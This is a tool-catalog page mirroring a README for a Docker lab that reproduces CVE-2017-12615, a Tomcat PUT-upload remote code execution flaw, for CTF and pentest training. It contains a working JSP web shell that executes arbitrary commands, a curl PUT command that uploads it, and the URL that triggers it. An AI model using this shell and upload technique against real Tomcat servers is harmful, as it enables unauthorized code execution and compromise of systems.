Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/netw0rk7/cve-2017-12615-home-lab
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingЛаборатории и Практика
GitHub
netw0rk7/cve-2017-12615-home-lab

CVE-2017-12615-Home-Lab

CVE-2017-12615 Tomcat: Удаленное выполнение кода через загрузку JSP — домашняя лаборатория для Red Teaming и тестирования на проникновение

Репозиторий
710 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

АНГЛИЙСКИЙ НИЖЕ

CVE-2017-12615 Tomcat: Удаленное выполнение кода через загрузку JSP

image

Lab นี้จำลองช่องโหว่ CVE-2017-12615 Tomcat: Remote Code Execution via JSP Upload
เกิดจากการตั้งค่า readonly=false ทำให้สามารถอัปโหลดไฟล์ผ่าน HTTP PUT ได้ รวมถึงไฟล์ .jsp ที่สามารถรันคำสั่ง (RCE)


image

Возможности

  • Apache Tomcat 7.0.79 (уязвимый)
  • Используется переопределение DefaultServlet с параметром readonly=false
  • Позволяет загружать файлы .jsp методом PUT в корневой веб-каталог ROOT
  • Поддерживает выполнение команд через веб-шелл
  • Веб-страница в индустриальном стиле с забытой внутренней заметкой (подсказка)
  • Автоматическая генерация flag_RANDOM.txt при каждом запуске контейнера
  • Предназначен для CTF / Red Team / Pentest Training

Структура каталогов

/opt/apache-tomcat-7.0.79/
/opt/apache-tomcat-7.0.79/webapps/ROOT/index.jsp
/opt/apache-tomcat-7.0.79/webapps/ROOT/WEB-INF/web.xml
/tmp/flag_RANDOM.txt
/docker-entrypoint.sh

การใช้งาน (Запуск контейнера)

docker compose build
docker compose up -d

เปิดเว็บ:

http://localhost:8080/

วิธีทดสอบช่องโหว่ CVE-2017-12615

1) สร้างไฟล์ JSP payload

cat > shell.jsp << 'EOF'
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    String s;
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    while ((s = r.readLine()) != null) out.println(s + "<br>");
}
%>
EOF

2) อัปโหลดไฟล์ด้วย PUT (ต้องมี / ท้ายชื่อไฟล์)

curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp

3) เรียกใช้งาน webshell

http://localhost:8080/shell.jsp?cmd=id

Флаг

เก็บไว้ใน:

/tmp/flag_RANDOM.txt

Английская версия — CVE-2017-12615 Tomcat: Удаленное выполнение кода через загрузку JSP

Эта лаборатория симулирует CVE-2017-12615 Tomcat: Remote Code Execution via JSP Upload, когда DefaultServlet Apache Tomcat неправильно настроен с:

readonly=false

Это позволяет злоумышленникам загружать файлы .jsp через HTTP PUT, что приводит к удаленному выполнению кода.


image

Возможности

  • Уязвимый Apache Tomcat 7.0.79
  • Переопределение DefaultServlet с readonly=false
  • Загрузка PUT → запись произвольных файлов .jsp в корневой веб-каталог ROOT
  • Поддержка выполнения команд через JSP-шелл
  • Целевая страница в индустриальном стиле с тонкой внутренней подсказкой
  • Автоматически создаваемый flag_RANDOM.txt при запуске контейнера
  • Подходит для CTF, исследований и разработки эксплойтов

Пример эксплуатации

Загрузить JSP-шелл

curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp

Выполнить команды

http://localhost:8080/shell.jsp?cmd=id

Расположение флага

/tmp/flag_RANDOM.txt

Отказ от ответственности

Только для образовательных, исследовательских и авторизованных тестов на проникновение.

Скачать инструмент